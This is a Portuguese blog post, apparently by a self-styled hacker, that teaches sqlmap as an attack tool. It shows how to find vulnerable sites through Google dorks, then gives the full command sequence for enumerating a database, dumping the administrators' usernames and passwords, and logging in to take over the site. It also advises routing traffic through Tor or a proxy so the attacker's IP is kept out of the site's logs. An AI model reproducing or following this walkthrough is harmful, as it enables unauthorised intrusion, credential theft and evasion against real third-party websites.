Como Usar Sqlmap oi hoje vou fazer uma tutorial sobre o sqlmap que e uma ferramenta para ataques sql ou seja sql injetion
ha vários sites vulneráveis na internet com o erro de sql e muito comum se achar esse sites bem a busca desses sites pode ser feita com o próprio sqlmap ou google hacking ha outras ferramentas como o inurlbr que e feita em php ela busca por pâramentro como um arquivo php que esses sites são feitos por exemplo read_php?id= isso e uma dork usada no inurlbr mas normalmente esses dorks são usada no google.
Bem vamos começar o tutorial pegue uma dork por exemplo procure por inurl:"read_php?id=" no google e você vai ver muitos sites vários desses sites podem ser vulneráveis a sql injetion. veja a baixo e um exemplo vamos fazer uma sql injetion nesse site
Vamos ussar essa url para fazer o ataque utilizando o sqlmap, espero que entenda que fazer isso em sites na internet e crime. ok vamos ao tutorial digete esse comando seguida da url do site com isso o sqlmap irá testa se site esta vulneravel
-u url do site
--current-db para pegar o banco de dados atual do site e lá a onde esta as senhas
sqlmap -u http://www.hibrido1337.blogspot.com/newspage.php?id=5 --current-db
como podem ver em baixo o site esta vulneravel a sql injetion apertem enter
veja embaixo que o sqlmap pegou o atual banco de dados do site que e exploit
bem digite esse comando para que o sqlmap possa exploarar o vulnerabilidade do site
-D usar a banco de dados do site digite -D seguido do nome do banco de dados do site
--tables para pegar a tabela do banco de dados
sqlmap -u http://www.hibrido1337.blogspot.com/newspage.php?id=5 -D exploit --tables
veja essas são as tabelas do site vamos ver o que tem em members
bem digite o camando para que possa pegar as coulnas
-D banco de dados
-T tabelas
--columns as colunas
sqlmap -u http://www.hibrido1337.blogspot.com/newspage.php?id=5 -D exploit -T members --columns
bem para pegar as colunas digite o comando
-D banco de dados
-T tabelas
-C as colunas
--dump para pegar as informações da coluna
sqlmap -u http://www.hibrido1337.blogspot.com/newspage.php?id=5 -D exploit -T members -C id,password,username --dump
bem como podem ver aqui estão os membros do site ou seja os administradores normal mente as senhas vem criptografadas em md5 ou sha1 mas qui esta em esta em texto puro sem criptocrafia
bem vamos pegar essa informação para invadir o site eu aconselho a usar o tor para esconder o seu ip você deve fazer isso desde o começo use a opção --proxy do sqlmap escolha um servidor proxy na web e use para que o seu ip não apareça nos logs do site. voces tem que achar a pagina de admin do site existem varias ferramentas para isso. com a pagina de admin do site encontrada e só colocar as informações que pegamos no dump do sqlmap. veja eu coloquei a primeira e só aperta enter
bem como vocês podem ver o site acaba de ser invadido by hibrido1337
Nenhum comentário:
Postar um comentário